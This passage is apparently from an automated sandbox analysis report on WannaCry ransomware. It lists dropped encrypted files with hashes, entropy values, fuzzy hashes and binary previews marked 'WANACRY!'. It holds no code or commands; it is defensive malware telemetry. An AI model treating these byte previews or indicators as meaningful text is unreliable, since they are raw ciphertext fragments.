                                                                              MD5:D5EAF9B80C6F743AA57E7E6B894CEF31
                                                                              SHA1:1F2645E4D0BA386ECA6B7783DEC75C11255160D8
                                                                              SHA-256:B3F073DB58CD7FB3397D8AC4A441DDE069D18D829EF41472C5D1AB5D3377E1C3
                                                                              SHA-512:F55529EC0FA96197591DB0D4CB48C3F19F896F6A4C9783CFF67C830E108C248129B18250AE419DB4364224799A80F794EF995AC7EEC2073A4B115F6A0BCD34F9
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........F32....dN...k...^Nw......+.\...2.........~go.1|.....w*...cm.P0NS...6......x..H.....#'..S.[..-.&X#.66R.iR.!.F.6L.M5..PLk..g.1.........\.i........X......j.j6.Su1"w..S..(.,.L..*k.w.Xt........Y.......5....u.. ..6Cdny.o@...&ib.K.u-...l..........E............{.......^..$..K...6..lP.).~.~.O{.l.>#@d.J(. A.t..b......3..I.-..>2.v...S...>(.......n.V.0.h.VP4.Y&.....-Y..zP...YF...Zu.>F.@P.......;?.z?.&..|..|y...j....g..K..4...m4C.a....6....P....K..(%.4z.0..[..I.+.zT...j.............q...p.\..Fx.u$.........c2...w_`..7..[..=C..3.v.^.G.y*..f..~2N.&.VS....S@.8..a9...|6.b..7E,J_....+.M.b..V..].b.F_....3...."&...W=go..-w......!...<.|%f..m...G5..-|YJ.J^f.8H_aU..L..Jo..^.=J...P\.....J.!.u.~.U.6.....S....a.!D..........`....P..(n.L.k.....:.M.]...].K....h..S."Li$..../..[.mV.m..R..%a>....g..8...-...}.G..r(...^.P.*..A.ya.Q.....!CITD.R.Em(...{.a.:...,e...oJ:..RD..%.{B......n.J.(..}....../.T..W1..|g...)...=q..<(.c`..:=.T.9:..5..o.....B..y.F.,s..s.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.858180014412193
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkgFm7YI0ZU92CiI0Re9Wki6ozljByygI6LX3Iq/xBe5TrIqtiAvVQQ:bkZYI01CE09C2I6LX4exB2TMqoAvqQ
                                                                              MD5:B0CF634A5DB478DE4BE6413792302260
                                                                              SHA1:D6E2524D862353D8095EBD71893864E805ED4BA4
                                                                              SHA-256:33FB07FF051B83B68170CF2499CD60E2E3DCC3F5FB5FF3A3B092B965D8A888BD
                                                                              SHA-512:A1659275273AFA32198B9729ADBBCB6532C68E56460254390B4603580DE4E38B92294971D7CA53FFA489ED8251663E4DDB98AA9246E89ECAD61415698D8E4EE4
                                                                              Malicious:false
                                                                              Preview:WANACRY!....'\.o...2.c..,.......-..}..~...S..{ (.#..YQ...HZ......{.K.....U..9n#d.[#.....G..@r..^NP.....].k.Y.a~[.F...S:..o D..t.....Km.a...M.|R.bTS.E.....m..L)T...y..G...mZ.%!A..$7,.>.....Mq\.c.:..b.<.n.9..v...H.r.$.8...H...,...y......P< ..........iJ.................QLg.}..[.r..M.......&..[..G4%.d.^.n,..|..(..c...#.......$b.......'.Ut)-.........afn.O.Dy5.S.,>...e.Z9.3M*.......6..H...._./... `6..mz.0...V...P.......E.IC.x.k...j<......]..6....H.^.^...,.W.A....1k?....`....U...l....i(.W......!%.\..+o.+.....2.&..^..}.M..D."....&.3.L...H..P.....v.s...B...^.....#.....1G..K....\..'......'....69.k...........V......h....3.7`....p..f-X.. G`q...4.F.{..s...-...%.mN~..s|.._..4.....>05.y*.o..*...Q.....tJ.....`..;.J...MD2....o...V_f)....o9:....z....i.p../D1....|...._..p.n..$.........o..jpxd.$=oX.h.....4..NI.$-B.4V.$...d$.mY..m................m.v..L.K.....D..3.}.M.'.@o..........2o..-K~"'...YG.x.(.E.2.6..'.....S.x.!A..z...6.j.!.Sv.c*6..d.#...NA\:'
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.858180014412193
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkgFm7YI0ZU92CiI0Re9Wki6ozljByygI6LX3Iq/xBe5TrIqtiAvVQQ:bkZYI01CE09C2I6LX4exB2TMqoAvqQ
                                                                              MD5:B0CF634A5DB478DE4BE6413792302260
                                                                              SHA1:D6E2524D862353D8095EBD71893864E805ED4BA4
                                                                              SHA-256:33FB07FF051B83B68170CF2499CD60E2E3DCC3F5FB5FF3A3B092B965D8A888BD
                                                                              SHA-512:A1659275273AFA32198B9729ADBBCB6532C68E56460254390B4603580DE4E38B92294971D7CA53FFA489ED8251663E4DDB98AA9246E89ECAD61415698D8E4EE4
                                                                              Malicious:false
                                                                              Preview:WANACRY!....'\.o...2.c..,.......-..}..~...S..{ (.#..YQ...HZ......{.K.....U..9n#d.[#.....G..@r..^NP.....].k.Y.a~[.F...S:..o D..t.....Km.a...M.|R.bTS.E.....m..L)T...y..G...mZ.%!A..$7,.>.....Mq\.c.:..b.<.n.9..v...H.r.$.8...H...,...y......P< ..........iJ.................QLg.}..[.r..M.......&..[..G4%.d.^.n,..|..(..c...#.......$b.......'.Ut)-.........afn.O.Dy5.S.,>...e.Z9.3M*.......6..H...._./... `6..mz.0...V...P.......E.IC.x.k...j<......]..6....H.^.^...,.W.A....1k?....`....U...l....i(.W......!%.\..+o.+.....2.&..^..}.M..D."....&.3.L...H..P.....v.s...B...^.....#.....1G..K....\..'......'....69.k...........V......h....3.7`....p..f-X.. G`q...4.F.{..s...-...%.mN~..s|.._..4.....>05.y*.o..*...Q.....tJ.....`..;.J...MD2....o...V_f)....o9:....z....i.p../D1....|...._..p.n..$.........o..jpxd.$=oX.h.....4..NI.$-B.4V.$...d$.mY..m................m.v..L.K.....D..3.}.M.'.@o..........2o..-K~"'...YG.x.(.E.2.6..'.....S.x.!A..z...6.j.!.Sv.c*6..d.#...NA\:'
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.837816867081134
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkYanGl6AiM2HmTNfN5QGoTPzUSufwc8KHmaKAaayHWk6wa/5l+:bkdRAPXTv5QVbUw5K8Aqr6ws5Q
                                                                              MD5:A00AA8360C9751A6D19FC02B050CAC9D
                                                                              SHA1:C83A68BF1180547EFBB11AD75945C0BDCE2B4EB3
                                                                              SHA-256:48CC2A670F725B7AF5909524E5940AE30795E5340E6D16062BC24FABF3A2B0C3
                                                                              SHA-512:749A89B7D4C269077BBC24337B73D8D019EE64B6C4481785F2A8C7154F87B895C6A8EEBCE00EDE2D5FE1550CBFE6ED3FFE304395CCC2BA4935CA5FE8F5857167
                                                                              Malicious:false
                                                                              Preview:WANACRY!....@...Bb1...[..(....G.X..r.q&....].../]0Q7...9QF...i,.jhv.R.).7&@_.".U.F^..f......t...7.;...Z.h....T.<...Q.j.k..O.MB._....C.$z......N...W......R.6...-..k....%.q{.T.W.Gd..P....pmJ.;........6..[..?.t.l.6B..0bp...Jt...C4w.j..,.....:`.^O..j5jSF.qz.../..............02.|....$V@P.z.(G.N..q...0...~4eI.,...@.2.9L..a@x${...0G...t-]".....~..\...Q.u....c..s.M...c....<c.G.".m...(....vOg....~..(.|..VC.b..'..i...qd9....~..YG..R....(Pv.U.!..Iq[..@G.4.W.7.\SI..B..fy!0[..|........L.....#...N-....._vuH.u?s@.!.....YLgn.B-`>.O.k.Q..B..cTgEbn....&b...AP$,;.!8N...B@i....>*~..:.(.Z..f..5[....!gk..Y&a.`3...h}...Q.) .{O.MQ...H....Iq....[.\..'......p..d^....;...Oy.....7u.L._....J....kB$]..N...nA...;...z./'..an...xP..}.&....][.+}....H._.Z6....p6....s.-.;pW.b.............`.....6...H.OG.@7.q..a..?.V..2\.|.:O.z....9..8..Q..'....Vl..$..#....(..^....i.|.o..c.lM\._e.....^......_.Zl.2J.&..T.[...h...D..|......~\.;.r\^...,.}.&..m....\."..k.`.b..R....D......1dJO...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.837816867081134
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkYanGl6AiM2HmTNfN5QGoTPzUSufwc8KHmaKAaayHWk6wa/5l+:bkdRAPXTv5QVbUw5K8Aqr6ws5Q
                                                                              MD5:A00AA8360C9751A6D19FC02B050CAC9D
                                                                              SHA1:C83A68BF1180547EFBB11AD75945C0BDCE2B4EB3
                                                                              SHA-256:48CC2A670F725B7AF5909524E5940AE30795E5340E6D16062BC24FABF3A2B0C3
                                                                              SHA-512:749A89B7D4C269077BBC24337B73D8D019EE64B6C4481785F2A8C7154F87B895C6A8EEBCE00EDE2D5FE1550CBFE6ED3FFE304395CCC2BA4935CA5FE8F5857167
                                                                              Malicious:false
                                                                              Preview:WANACRY!....@...Bb1...[..(....G.X..r.q&....].../]0Q7...9QF...i,.jhv.R.).7&@_.".U.F^..f......t...7.;...Z.h....T.<...Q.j.k..O.MB._....C.$z......N...W......R.6...-..k....%.q{.T.W.Gd..P....pmJ.;........6..[..?.t.l.6B..0bp...Jt...C4w.j..,.....:`.^O..j5jSF.qz.../..............02.|....$V@P.z.(G.N..q...0...~4eI.,...@.2.9L..a@x${...0G...t-]".....~..\...Q.u....c..s.M...c....<c.G.".m...(....vOg....~..(.|..VC.b..'..i...qd9....~..YG..R....(Pv.U.!..Iq[..@G.4.W.7.\SI..B..fy!0[..|........L.....#...N-....._vuH.u?s@.!.....YLgn.B-`>.O.k.Q..B..cTgEbn....&b...AP$,;.!8N...B@i....>*~..:.(.Z..f..5[....!gk..Y&a.`3...h}...Q.) .{O.MQ...H....Iq....[.\..'......p..d^....;...Oy.....7u.L._....J....kB$]..N...nA...;...z./'..an...xP..}.&....][.+}....H._.Z6....p6....s.-.;pW.b.............`.....6...H.OG.@7.q..a..?.V..2\.|.:O.z....9..8..Q..'....Vl..$..#....(..^....i.|.o..c.lM\._e.....^......_.Zl.2J.&..T.[...h...D..|......~\.;.r\^...,.}.&..m....\."..k.`.b..R....D......1dJO...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.845068104589248
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkwH90wdyw7DLAKJwxDKZV4xti6Mz0DH2sBCpWbDkmdpnk8bozazhSuSXhYqJb2n:bkwHu5GAKJwx2VKti6NDnCpmlk8szaVb
                                                                              MD5:4C29F27E4DE6FCF330E2774727EB6474
                                                                              SHA1:159B0365C064DC4E1BEBF2EFEBC1AC212E930C9B
                                                                              SHA-256:9717186FDAE879190DB35F3AD36E45B75E589B4C1BB42C43D38E301C0AC31A93
                                                                              SHA-512:71CCBD1229DACA474EB6BAC8F68A1D9F1A2D78C7771BBD7C217DA7CA8EFBBEC8256F97A63BC902993429E80EBBD38633AA5D667C01D03B369DF7F0FCD7CD1749
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....]..FR..usk....d..........f.....[.y#..4D..j.N$.,....."s..4..+.a.#>$ys\...v0..+.diKE.....Zl.....g.Z....?k~~.....P.9)i.....Xy."0.N.y..#...q../...../....0.j.f.8 uJR..S...z...$B..?(v.c2..].A.#.....P.....gh.L.i.1i\........I+H7L.........V..?..|..>..m@...............f......+ ."..]..v..l....\._.C}bz...LD.4...qM^...9.~..HV.)<.[(nt..r...i..."........?...$.,...O.{.....4n..!S<.."....u..Y..B.f_.._....Q..x..,.....u,..H.........bJ.l.s.$hj..3..m..y0...O...t..@R.U..\..U-f.H.(...%'.k......gT...kN...V..-....u5?GZF....p~..2..S...i.,/.i(8....U...6._[.9."V.L.....ZS(x..^...l0.0R..>x.7..."..@D.J8.yLw.u.-}.~.yd.8/3../..`9.E.3.........+,.*...^.*..3|...[...B..w..8v.M....xM,.W`..kf.P.......m..P.R.H.k.'mF.94....,./..Y.'.[&...=.....JR.{..."..{.KW.....P.]...m..6pm..O.9..<.S......[.LuJr.S.J.@.m..q......SB3.a.V..U.]yc1*\$Z+..^..R$..;TX.S.x.e.H..l..~L.,Xb1....6%f.!s.f^S.X.sA.x.A._.?Ts2.^P..}U..N...It.....vo...w..V5p~.H#.u.._..\<p....+.jZ.../.#..7.n......i..:...u.-b.I.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.845068104589248
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkwH90wdyw7DLAKJwxDKZV4xti6Mz0DH2sBCpWbDkmdpnk8bozazhSuSXhYqJb2n:bkwHu5GAKJwx2VKti6NDnCpmlk8szaVb
                                                                              MD5:4C29F27E4DE6FCF330E2774727EB6474
                                                                              SHA1:159B0365C064DC4E1BEBF2EFEBC1AC212E930C9B
                                                                              SHA-256:9717186FDAE879190DB35F3AD36E45B75E589B4C1BB42C43D38E301C0AC31A93
                                                                              SHA-512:71CCBD1229DACA474EB6BAC8F68A1D9F1A2D78C7771BBD7C217DA7CA8EFBBEC8256F97A63BC902993429E80EBBD38633AA5D667C01D03B369DF7F0FCD7CD1749
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....]..FR..usk....d..........f.....[.y#..4D..j.N$.,....."s..4..+.a.#>$ys\...v0..+.diKE.....Zl.....g.Z....?k~~.....P.9)i.....Xy."0.N.y..#...q../...../....0.j.f.8 uJR..S...z...$B..?(v.c2..].A.#.....P.....gh.L.i.1i\........I+H7L.........V..?..|..>..m@...............f......+ ."..]..v..l....\._.C}bz...LD.4...qM^...9.~..HV.)<.[(nt..r...i..."........?...$.,...O.{.....4n..!S<.."....u..Y..B.f_.._....Q..x..,.....u,..H.........bJ.l.s.$hj..3..m..y0...O...t..@R.U..\..U-f.H.(...%'.k......gT...kN...V..-....u5?GZF....p~..2..S...i.,/.i(8....U...6._[.9."V.L.....ZS(x..^...l0.0R..>x.7..."..@D.J8.yLw.u.-}.~.yd.8/3../..`9.E.3.........+,.*...^.*..3|...[...B..w..8v.M....xM,.W`..kf.P.......m..P.R.H.k.'mF.94....,./..Y.'.[&...=.....JR.{..."..{.KW.....P.]...m..6pm..O.9..<.S......[.LuJr.S.J.@.m..q......SB3.a.V..U.]yc1*\$Z+..^..R$..;TX.S.x.e.H..l..~L.,Xb1....6%f.!s.f^S.X.sA.x.A._.?Ts2.^P..}U..N...It.....vo...w..V5p~.H#.u.._..\<p....+.jZ.../.#..7.n......i..:...u.-b.I.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.856936136470886
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkY/feFnYG9M8Bz94prehnlxBPjpCZPkWygmg7L0lIjcHnQRbmG1/:bkY3eFnYeMIuyhnlz7UZyg17YljwRr1/
                                                                              MD5:3710BA17601C846C8798E7099493A9D1
                                                                              SHA1:2D666B57AFA21E2EDC45374D95CF560122C26CBC
                                                                              SHA-256:4C3A0E58D046A4A4C52BEB9B9FF41F4379FF7A5ED80354B3798124B79E08B6E0
                                                                              SHA-512:EB7C882F4C9CFC3D4D23E9E074B42714E27309F8180B3AC248A0290540A933056E96196A09839BC9563600D5E4707FE3ECF6DF14C851F13A48B194DEFF8A53E4
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....$......JW..W.i.iZ..}Y`.;NL.HK..8....W0...9.......c...4...o1#9.mt.E....cs.-.d5.l..?..Z.8.. l.`..s^..^5..J.R.+.[h....8.n.aI..."..#....#..g..D..D.@...Y.../"'VF:.i.x,.J.A.{.4....T.(m..j{..1.%w..................E.}.e.)A..G....8@.7..aP....y..................]..dx..WCmJG.k.p..~ T..U..L.o8GF.;.....B...R.(.-3TC..y(...n.}.-nuB@T3z.^lg.]..........#f.e .G;s.l.}...Xe....n..b'p.k..0..f.....j.bX;.....A..k&1.$3.ay....f..r.g..lx-..!W..C..+.W|4u?I.X(.F}...V.....}.l....hn^#..3w.e...1.ZR..;.u.....g../.0.....J......l..>..RK9.$..?r...d...|.....T..Px'..v....iIl.C5.~....{.<....`n.U.3.';x`...{.?..p6'+r..v.S..G..c.s.....6.S'h......:...7.7..5.-.&......."U.[....Y.\..+r[.._....L..z,.0.)Y.w.......U..|.P.#*.K.i4....K..3.n.....u.?.JP..Q.8w..O,D>..CQ.......`.;NK5......P./a@..,.M.......)...O......|N.9.zH5....5A..C....?^..O.u..........E,y..0...>.0...4.,}v.....G.3/P...W#.....(V........mp...d..I....7....~Q.y_K..E.%..S..X"D..r..5....^..#...k.,.iHU.9......t
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.856936136470886
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkY/feFnYG9M8Bz94prehnlxBPjpCZPkWygmg7L0lIjcHnQRbmG1/:bkY3eFnYeMIuyhnlz7UZyg17YljwRr1/
                                                                              MD5:3710BA17601C846C8798E7099493A9D1
                                                                              SHA1:2D666B57AFA21E2EDC45374D95CF560122C26CBC
                                                                              SHA-256:4C3A0E58D046A4A4C52BEB9B9FF41F4379FF7A5ED80354B3798124B79E08B6E0
                                                                              SHA-512:EB7C882F4C9CFC3D4D23E9E074B42714E27309F8180B3AC248A0290540A933056E96196A09839BC9563600D5E4707FE3ECF6DF14C851F13A48B194DEFF8A53E4
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....$......JW..W.i.iZ..}Y`.;NL.HK..8....W0...9.......c...4...o1#9.mt.E....cs.-.d5.l..?..Z.8.. l.`..s^..^5..J.R.+.[h....8.n.aI..."..#....#..g..D..D.@...Y.../"'VF:.i.x,.J.A.{.4....T.(m..j{..1.%w..................E.}.e.)A..G....8@.7..aP....y..................]..dx..WCmJG.k.p..~ T..U..L.o8GF.;.....B...R.(.-3TC..y(...n.}.-nuB@T3z.^lg.]..........#f.e .G;s.l.}...Xe....n..b'p.k..0..f.....j.bX;.....A..k&1.$3.ay....f..r.g..lx-..!W..C..+.W|4u?I.X(.F}...V.....}.l....hn^#..3w.e...1.ZR..;.u.....g../.0.....J......l..>..RK9.$..?r...d...|.....T..Px'..v....iIl.C5.~....{.<....`n.U.3.';x`...{.?..p6'+r..v.S..G..c.s.....6.S'h......:...7.7..5.-.&......."U.[....Y.\..+r[.._....L..z,.0.)Y.w.......U..|.P.#*.K.i4....K..3.n.....u.?.JP..Q.8w..O,D>..CQ.......`.;NK5......P./a@..,.M.......)...O......|N.9.zH5....5A..C....?^..O.u..........E,y..0...>.0...4.,}v.....G.3/P...W#.....(V........mp...d..I....7....~Q.y_K..E.%..S..X"D..r..5....^..#...k.,.iHU.9......t
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84632802141387
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkTdTDBg5/2qnqKJzG7gJNfCZ8jYuBnZ0X06nwSFWDgAphc6Ybp8Vnk:bkUXz8tCjYuVZMk5phU8Vnk
                                                                              MD5:BC6DB6DF09807604846C71625E205734
                                                                              SHA1:84B31EF7F0F9FD5E31C18BBFD38352A917670E96
                                                                              SHA-256:0F104C5F3CAF3B4009C69C5E21B940A0BBAF41CCDC94FC758B701AAAC4805C2C
                                                                              SHA-512:FCBE8108B6390D687B12A43640C3765759743CB9AD6FA2E8944129DF53F2A314D8CAE318EB4B528ACD3DD7A9965F2FDD43111B888AFB228CC8F9561BE6DFECF1
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........F~..Xx.RD.s..V......<.~`P..vL.K.. I..G.... .5.q.}$/..m..bm.........Kg....)S,o.....H.....". w.gy.@...._w..Y......~..........NZ.P...v...[..I.e&..vh!.RlI&..g<..U6.,..;..9&.2H...>q.....%....C+.....9U..-.....lZ.[.'...9..yW...E.\..C...^0...~...............S....!......Z.]..\..".. .....o.S.....m.\...Q.r..pM@....0=.v..m!a......9E...')o..H.@sn......g.{...z!.r.U\.....Q...Q.....L,.s.jg|p./$.B..,2.;Bd.#D^..a"..Z},..........U....1...!....#.2f.Y(.~...*..n...9.H...!....<RP../.C0s.z)...o.OV...q..............).......;..P....]....e&.?.....S.e+.T.y...3}U)....&h......$H...A.WY^4K....6..(..,.6.*=.A.&....-~vU..1d..1Q.?.....iIWP^S...<(...K..*....gK...#.,2:{.....l...F..OM..%b,.R..TC..g..V....Uk.X.9..&0.V.......X..@..,;..i_....j.O%0:TE.f+.I6O.k..[......i.<.d.. '.... H.~..1<I..C.s.............Sv+i....?F...R.......,.c4..p.}.,0....k.P..>.s.ZU.T.............S......Y.6}.........w..`....r.=5...Pt........1.K.7e....d...@.F.....id.z..$.Ox"........v.....$...+F.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84632802141387
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkTdTDBg5/2qnqKJzG7gJNfCZ8jYuBnZ0X06nwSFWDgAphc6Ybp8Vnk:bkUXz8tCjYuVZMk5phU8Vnk
                                                                              MD5:BC6DB6DF09807604846C71625E205734
                                                                              SHA1:84B31EF7F0F9FD5E31C18BBFD38352A917670E96
                                                                              SHA-256:0F104C5F3CAF3B4009C69C5E21B940A0BBAF41CCDC94FC758B701AAAC4805C2C
                                                                              SHA-512:FCBE8108B6390D687B12A43640C3765759743CB9AD6FA2E8944129DF53F2A314D8CAE318EB4B528ACD3DD7A9965F2FDD43111B888AFB228CC8F9561BE6DFECF1
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........F~..Xx.RD.s..V......<.~`P..vL.K.. I..G.... .5.q.}$/..m..bm.........Kg....)S,o.....H.....". w.gy.@...._w..Y......~..........NZ.P...v...[..I.e&..vh!.RlI&..g<..U6.,..;..9&.2H...>q.....%....C+.....9U..-.....lZ.[.'...9..yW...E.\..C...^0...~...............S....!......Z.]..\..".. .....o.S.....m.\...Q.r..pM@....0=.v..m!a......9E...')o..H.@sn......g.{...z!.r.U\.....Q...Q.....L,.s.jg|p./$.B..,2.;Bd.#D^..a"..Z},..........U....1...!....#.2f.Y(.~...*..n...9.H...!....<RP../.C0s.z)...o.OV...q..............).......;..P....]....e&.?.....S.e+.T.y...3}U)....&h......$H...A.WY^4K....6..(..,.6.*=.A.&....-~vU..1d..1Q.?.....iIWP^S...<(...K..*....gK...#.,2:{.....l...F..OM..%b,.R..TC..g..V....Uk.X.9..&0.V.......X..@..,;..i_....j.O%0:TE.f+.I6O.k..[......i.<.d.. '.... H.~..1<I..C.s.............Sv+i....?F...R.......,.c4..p.}.,0....k.P..>.s.ZU.T.............S......Y.6}.........w..`....r.=5...Pt........1.K.7e....d...@.F.....id.z..$.Ox"........v.....$...+F.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8354707461899435
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk9ABGIZ+44kIIBx56/MWv7W34t7qMLRL8of5+V2vwAQptlzTqC:bk9b/FlIBr6/E3qqUmVTZpvTZ
                                                                              MD5:CD3D456F8BD8936C1FB8726B8DECD64C
                                                                              SHA1:90CF3A9ACD000B9EEF788284EC69FB15213277BE
                                                                              SHA-256:A8175866868B45BBC770EDC2CB21EE5B1793AC5D21924EC3C717C281E6F3C721
                                                                              SHA-512:6550944AB8F0A779C17C62524110BEB4AA1446B1B50CD3FBCE30EB635453FC37C29FBD7690A220AB8506CCB3E8DDC976B0FDC039C91634AEFF6EAAEEC1805CBC
                                                                              Malicious:false
                                                                              Preview:WANACRY!......m..W}....&L1$..s..}.)..[U.....C..~|.4ieF/..W~..s\Pu...i1o.ja.d^.F..+{o.!N.....W:v..Rf..B......../-K..P...L...b&9..^.Y..........sA.b..0a.m;@3...3..U....1...E.\....c'.'ih.S...1..~@1.O5)c.d.9........>.......D.f...........[...8f+E....u.[............6.],..p.N.._..D.....!..&..6..b....s-...$....o]A.#B+#6>.TI.y.F..L....N.....[.....y$...H/1"..u.[..k..\.... Bx0.?\...W.].#..'P>^.1.`9....G...Ex.VR.$.f..S....y....&.Q.JI..4.y.I..4......#...r......@%..-.K.v...BO.;a.!FXpm....H,....C.<!..Q8..".0....T...^....nT7dj.S.`R..........'c.M..\f......o...p.>....)..+.V.....e...e|Y."&...........po....)..1..+.Uqb"...g....G.I..Q..s.w...e.q&..<....O}..N.m.. oS.KR...f.8...X.@.....L..........r...AX..@5-:...........C.6..........y....3.t..GFS.Q.V.._.......z..$.....:.I....e,9l..$..'...>.5j....6.,a.6..lf.e...:..jj2..~t.7. >|y.....y(.C.x..9.48........zPTS...n8..J...O).b.b...cI.. .1....{Z........a..:oek.4....(.J.....C!lD.<.Q...Sc......9I.....#......(Sz
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8354707461899435
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk9ABGIZ+44kIIBx56/MWv7W34t7qMLRL8of5+V2vwAQptlzTqC:bk9b/FlIBr6/E3qqUmVTZpvTZ
                                                                              MD5:CD3D456F8BD8936C1FB8726B8DECD64C
                                                                              SHA1:90CF3A9ACD000B9EEF788284EC69FB15213277BE
                                                                              SHA-256:A8175866868B45BBC770EDC2CB21EE5B1793AC5D21924EC3C717C281E6F3C721
                                                                              SHA-512:6550944AB8F0A779C17C62524110BEB4AA1446B1B50CD3FBCE30EB635453FC37C29FBD7690A220AB8506CCB3E8DDC976B0FDC039C91634AEFF6EAAEEC1805CBC
                                                                              Malicious:false
                                                                              Preview:WANACRY!......m..W}....&L1$..s..}.)..[U.....C..~|.4ieF/..W~..s\Pu...i1o.ja.d^.F..+{o.!N.....W:v..Rf..B......../-K..P...L...b&9..^.Y..........sA.b..0a.m;@3...3..U....1...E.\....c'.'ih.S...1..~@1.O5)c.d.9........>.......D.f...........[...8f+E....u.[............6.],..p.N.._..D.....!..&..6..b....s-...$....o]A.#B+#6>.TI.y.F..L....N.....[.....y$...H/1"..u.[..k..\.... Bx0.?\...W.].#..'P>^.1.`9....G...Ex.VR.$.f..S....y....&.Q.JI..4.y.I..4......#...r......@%..-.K.v...BO.;a.!FXpm....H,....C.<!..Q8..".0....T...^....nT7dj.S.`R..........'c.M..\f......o...p.>....)..+.V.....e...e|Y."&...........po....)..1..+.Uqb"...g....G.I..Q..s.w...e.q&..<....O}..N.m.. oS.KR...f.8...X.@.....L..........r...AX..@5-:...........C.6..........y....3.t..GFS.Q.V.._.......z..$.....:.I....e,9l..$..'...>.5j....6.,a.6..lf.e...:..jj2..~t.7. >|y.....y(.C.x..9.48........zPTS...n8..J...O).b.b...cI.. .1....{Z........a..:oek.4....(.J.....C!lD.<.Q...Sc......9I.....#......(Sz
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8295760529397675
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkPe2NAcC9CwjcwUMabqH3rd/05HAnFYhKTAfeCbwJetDf+6hMN4WkXyvi8tWSkE:bkPe5CwowU9bgCAnFoYAmHJR2MWWyij
                                                                              MD5:6E98C0B4B32B8B8A34881EEE65598B1B
                                                                              SHA1:FAFB9245DB743F8DC532BDEDD64AEC359D332A66
                                                                              SHA-256:112083B73038ACF5DBABC935FDF4CA3599B8DC560482DD328C20AB63D8F5CD86
                                                                              SHA-512:EA4EB6D312742ED809F592353DBD6633A988C01021EE3365E734E22A9B106796E68A4BB2477D1A7DD78E4691A2B8EAA0D9911CD7BED3D7077E4EC171C7C8A846
                                                                              Malicious:false
                                                                              Preview:WANACRY!.............3~..T.'....Q.f....>d....;e.1...6.O2..bb ......x;.*.3.nk.W..mi.(..^...e...Z.KK..8..?..A89rU......d>..m....h..[...s{w........W7.l'.0...}Gg...,o.....U.Y..4.xD./..k...%3^..q..8L9. .....K..0...r.................#".......2..S..J.om-.6...@g................#.Z.[.M........V...........k?..G=B.[.F..8..{V.w9.b.....%.A..D...?E....8..?...m?..-^h..8`)9...........XV...'..Y.,.Yx1...4..p..j.S...1g+.r%.A.+`.Q.bb+..}w.T.....n..."J?&.H...../.......).'.........k..sj^.O...y]....~.....M.W<q]...>.+....".j..t.qD%..|. ..Bzb...fi",(..nz.lV....D....V......Q.U.^..i..H....w...w...}..'.$.1...v..\.SP..rvg........~./...5.J...#..U...K......%..d.N.......U*.....h.0.....2.:o....r..!..,...........oH;......:..P<..GoWER...P.(ad.L'.T_.i.!D.q.5Eo4.w!.+....W...G.{/..Poa..r?...V_..fP.pP.......6...d..}.p./1.|...S.w......3...4.....8a..../l...e..Y,'.*..ch).:.j.Bv.I....|Qm1..:.V..G.p..8..m.A.,..R0. ....MoP.k..N^..Bu..o.s8.\...Iq. ..La5.....c...jy.u)H..jJo...}...[..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8295760529397675
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkPe2NAcC9CwjcwUMabqH3rd/05HAnFYhKTAfeCbwJetDf+6hMN4WkXyvi8tWSkE:bkPe5CwowU9bgCAnFoYAmHJR2MWWyij
                                                                              MD5:6E98C0B4B32B8B8A34881EEE65598B1B
